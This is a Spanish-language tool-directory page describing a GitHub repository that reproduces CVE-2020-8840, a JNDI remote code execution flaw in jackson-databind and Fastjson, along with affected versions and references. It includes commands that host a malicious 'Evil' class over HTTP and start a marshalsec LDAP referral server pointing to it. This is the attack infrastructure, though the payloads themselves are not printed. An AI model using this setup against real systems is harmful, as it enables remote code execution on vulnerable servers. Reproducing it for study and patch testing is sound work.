Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-8840 — Código de entorno de reproducción y análisis de la vulnerabilidad de ejecución remota de código en Jackson-databind (CVE-2020-8840) | Kitploit
Herramientas/GitHubGitHub/veraxy00/cve-2020-8840
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónLabs y Práctica
GitHubveraxy00/cve-2020-8840

CVE-2020-8840

Código de entorno de reproducción y análisis de la vulnerabilidad de ejecución remota de código en Jackson-databind (CVE-2020-8840)

Ver Repositorio
42hace 5 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2020-8840

Código del entorno de reproducción y análisis de la vulnerabilidad de ejecución remota de código en Jackson-databind (CVE-2020-8840).

El proyecto incluye:

  • jackson-databind, Fastjson payloads
  • Clase maliciosa WebServer
  • marshalsec-0.0.3-SNAPSHOT-all.jar compilado

Resumen de la vulnerabilidad

Vulnerabilidad de ejecución remota de código en Jackson-databind (CVE-2020-8840). Un atacante puede aprovechar la cadena de explotación de xbean-reflect (org.apache.xbean.propertyeditor.JndiConverter) para desencadenar la carga remota de clases JNDI y así lograr la ejecución remota de código.

Esta vulnerabilidad afecta a ciertas versiones de jackson-databind y Fastjson.

jackson-databind

Versiones afectadas: 2.0.0 <= FasterXML jackson-databind <= 2.9.10.2

Configuración simple del entorno

El servicio LDAP al que apunta el código de ejemplo debe configurarse por su cuenta.

WebServer

Inicie un servicio HTTP para alojar la clase maliciosa (en el proyecto se incluye la clase Evil.java).

root@kitploit:~
python -m http.server 2222

Servicio LDAP

Descargue la herramienta Marshalsec, compílela como jar, inicie el servicio LDAP y establezca la dirección codebase (el WebServer que aloja la clase maliciosa).

Para mayor comodidad, se omite la descarga y compilación; en el proyecto también se incluye marshalsec-0.0.3-SNAPSHOT-all.jar (el código del proyecto no es extenso, esta es la razón principal del gran tamaño), compilado con JDK8.

root@kitploit:~
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:2222/#Evil

Fastjson

Versiones afectadas: Fastjson <= 1.2.62

El entorno de reproducción es el mismo que el anterior; configure e inicie el WebServer y el servicio LDAP por su cuenta.

Referencias

  • https://github.com/FasterXML/jackson-databind
  • https://github.com/FasterXML/jackson-databind/issues/2620
  • https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497
  • https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062
  • https://github.com/alibaba/fastjson
Descargar herramienta